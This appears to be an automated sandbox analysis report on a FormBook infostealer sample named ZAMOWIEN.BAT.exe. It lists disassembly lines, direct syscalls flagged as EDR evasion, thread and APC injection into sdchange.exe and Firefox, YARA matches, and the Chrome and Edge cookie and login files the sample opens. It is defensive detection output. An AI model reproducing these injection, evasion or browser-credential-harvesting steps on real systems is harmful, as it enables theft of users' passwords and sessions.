Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289F525 mov eax, dword ptr fs:[00000030h]	4_2_3289F525
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282D530 mov eax, dword ptr fs:[00000030h]	4_2_3282D530
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282D530 mov eax, dword ptr fs:[00000030h]	4_2_3282D530
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C5537 mov eax, dword ptr fs:[00000030h]	4_2_328C5537
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]	4_2_3289B550
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]	4_2_3289B550
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289B550 mov eax, dword ptr fs:[00000030h]	4_2_3289B550
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]	4_2_327E758F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]	4_2_327E758F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E758F mov eax, dword ptr fs:[00000030h]	4_2_327E758F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282B570 mov eax, dword ptr fs:[00000030h]	4_2_3282B570
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3282B570 mov eax, dword ptr fs:[00000030h]	4_2_3282B570
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AFA87 mov eax, dword ptr fs:[00000030h]	4_2_328AFA87
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289DAAC mov ecx, dword ptr fs:[00000030h]	4_2_3289DAAC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289DAAC mov ecx, dword ptr fs:[00000030h]	4_2_3289DAAC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289DAAC mov eax, dword ptr fs:[00000030h]	4_2_3289DAAC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]	4_2_328A1AA3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]	4_2_328A1AA3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328A1AA3 mov eax, dword ptr fs:[00000030h]	4_2_328A1AA3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DAAE mov eax, dword ptr fs:[00000030h]	4_2_3281DAAE
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E9A40 mov ecx, dword ptr fs:[00000030h]	4_2_327E9A40
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32871ACB mov eax, dword ptr fs:[00000030h]	4_2_32871ACB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32871ACB mov ecx, dword ptr fs:[00000030h]	4_2_32871ACB
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov ecx, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBA30 mov eax, dword ptr fs:[00000030h]	4_2_327FBA30
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32885AD0 mov eax, dword ptr fs:[00000030h]	4_2_32885AD0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281BADA mov eax, dword ptr fs:[00000030h]	4_2_3281BADA
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EBA10 mov eax, dword ptr fs:[00000030h]	4_2_327EBA10
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]	4_2_3289BA0B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]	4_2_3289BA0B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]	4_2_3289BA0B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3289BA0B mov eax, dword ptr fs:[00000030h]	4_2_3289BA0B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]	4_2_32825A01
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32825A01 mov ecx, dword ptr fs:[00000030h]	4_2_32825A01
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]	4_2_32825A01
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32825A01 mov eax, dword ptr fs:[00000030h]	4_2_32825A01
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AFA02 mov eax, dword ptr fs:[00000030h]	4_2_328AFA02
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32897A11 mov edi, dword ptr fs:[00000030h]	4_2_32897A11
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32819A18 mov ecx, dword ptr fs:[00000030h]	4_2_32819A18
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3286DA1D mov eax, dword ptr fs:[00000030h]	4_2_3286DA1D
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EBAE0 mov eax, dword ptr fs:[00000030h]	4_2_327EBAE0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DA20 mov eax, dword ptr fs:[00000030h]	4_2_3281DA20
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DA20 mov eax, dword ptr fs:[00000030h]	4_2_3281DA20
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EFAA4 mov ecx, dword ptr fs:[00000030h]	4_2_327EFAA4
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBAA0 mov eax, dword ptr fs:[00000030h]	4_2_327FBAA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327FBAA0 mov eax, dword ptr fs:[00000030h]	4_2_327FBAA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32883A78 mov eax, dword ptr fs:[00000030h]	4_2_32883A78
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]	4_2_327E7A80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]	4_2_327E7A80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327E7A80 mov eax, dword ptr fs:[00000030h]	4_2_327E7A80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B9B8B mov eax, dword ptr fs:[00000030h]	4_2_328B9B8B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328B9B8B mov eax, dword ptr fs:[00000030h]	4_2_328B9B8B
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]	4_2_328C3B80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]	4_2_328C3B80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C3B80 mov eax, dword ptr fs:[00000030h]	4_2_328C3B80
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]	4_2_32829B9F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]	4_2_32829B9F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829B9F mov eax, dword ptr fs:[00000030h]	4_2_32829B9F
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AFB97 mov eax, dword ptr fs:[00000030h]	4_2_328AFB97
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DBA0 mov eax, dword ptr fs:[00000030h]	4_2_3281DBA0
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327EFB4C mov edi, dword ptr fs:[00000030h]	4_2_327EFB4C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]	4_2_32803BD6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]	4_2_32803BD6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]	4_2_32803BD6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]	4_2_32803BD6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32803BD6 mov eax, dword ptr fs:[00000030h]	4_2_32803BD6
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]	4_2_3287FBDC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]	4_2_3287FBDC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3287FBDC mov eax, dword ptr fs:[00000030h]	4_2_3287FBDC
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32831BEF mov eax, dword ptr fs:[00000030h]	4_2_32831BEF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32831BEF mov eax, dword ptr fs:[00000030h]	4_2_32831BEF
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AFBF3 mov eax, dword ptr fs:[00000030h]	4_2_328AFBF3
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1B04 mov eax, dword ptr fs:[00000030h]	4_2_327F1B04
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_327F1B04 mov eax, dword ptr fs:[00000030h]	4_2_327F1B04
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov eax, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_3281DB00 mov edx, dword ptr fs:[00000030h]	4_2_3281DB00
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328AFB0C mov eax, dword ptr fs:[00000030h]	4_2_328AFB0C
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_328C3B10 mov eax, dword ptr fs:[00000030h]	4_2_328C3B10
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Code function: 4_2_32829B28 mov eax, dword ptr fs:[00000030h]	4_2_32829B28

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sdchange.exe

Thread register set: target process: 7252

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sdchange.exe

Thread APC queued: target process: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe

Jump to behavior

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe	Process created: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"	Jump to behavior
Source: C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: iIQnSvahHYwDQ.exe, 00000005.00000000.2347132225.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885414056.0000000000E30000.00000002.00000001.00040000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000000.2508197877.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exe

0_2_0040364B

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
